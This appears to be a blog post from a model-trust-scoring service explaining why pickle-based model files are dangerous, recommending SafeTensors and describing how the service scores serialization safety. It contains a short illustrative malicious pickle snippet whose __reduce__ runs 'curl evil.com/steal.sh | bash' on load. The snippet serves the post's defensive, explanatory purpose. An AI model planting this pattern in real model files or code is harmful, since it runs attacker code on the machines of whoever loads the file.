When you download an AI model from HuggingFace or any other repository, you're placing significant trust in that model's creator. But what if the model file itself could execute arbitrary code on your machine? That's the reality of pickle files, and it's why HuggingHugh penalizes models that use them.
What Are Pickle Files?
Python's pickle module is a serialization format that converts Python objects into byte streams. It's convenient for saving and loading complex data structures, including neural network weights. For years, PyTorch used .bin files (which are pickle-based) as the default format for saving model state dictionaries.
The problem? Pickle files can contain arbitrary Python code that executes automatically when the file is loaded.
The Security Risk
Here's a simplified example of how malicious pickle files work:
import pickle
import os
class Malicious:
def __reduce__(self):
return (os.system, ('curl evil.com/steal.sh | bash',))
# This creates a "model" that runs commands when loaded
pickle.dump(Malicious(), open('model.bin', 'wb'))
When someone loads this "model" with torch.load(), the malicious code executes. The attacker could:
- Steal credentials from environment variables
- Install cryptocurrency miners on your GPU
- Exfiltrate training data or proprietary datasets
- Establish persistent backdoors in your infrastructure
Real-World Incidents
This isn't theoretical. Security researchers have demonstrated pickle-based attacks against ML pipelines, and the HuggingFace community has dealt with malicious model uploads. The platform now scans for obvious threats, but sophisticated attacks can evade detection.
The SafeTensors Solution
SafeTensors is a new serialization format designed specifically for ML model weights. Unlike pickle, it:
- Cannot execute code - it's a pure data format
- Supports zero-copy loading - faster model loading
- Works across frameworks - PyTorch, TensorFlow, JAX, etc.
- Validates on load - corrupted files fail safely
Most major model providers now offer SafeTensors versions of their models, and HuggingFace recommends it as the default format.
How HuggingHugh Evaluates This
Our trust scoring system includes two factors related to serialization safety:
-
SafeTensors Usage (18 points): Models that exclusively use SafeTensors get full marks. Models with both SafeTensors and pickle get partial credit. Pickle-only models get zero.
-
No Pickle Files (18 points): We check for the presence of any
.bin,.pkl, or.picklefiles in the repository. Models without these risky formats score higher.
Together, these factors account for 36% of the total trust score, reflecting how seriously we take serialization security.
What You Should Do
- Prefer SafeTensors models when available (look for
.safetensorsfiles) - Check HuggingHugh for trust scores before downloading
- Never load pickle files from untrusted sources
- Run models in sandboxed environments when possible
- Keep your ML libraries updated for security patches
Conclusion
The AI community is moving toward safer serialization formats, but the transition isn't complete. Until then, tools like HuggingHugh help you identify which models prioritize security. A model that still uses pickle in 2025 might not be malicious, but it does suggest the maintainers aren't following security best practices.
Check your favorite models on our dashboard and see how they score.